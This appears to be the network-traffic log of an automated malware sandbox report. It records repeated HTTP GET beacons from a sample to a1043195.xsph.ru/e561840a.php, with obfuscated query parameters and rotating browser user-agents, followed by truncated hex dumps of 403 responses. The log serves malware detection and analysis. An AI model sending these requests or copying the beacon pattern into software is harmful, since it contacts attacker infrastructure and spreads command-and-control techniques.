Source: global traffic HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic DNS traffic detected: DNS query: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 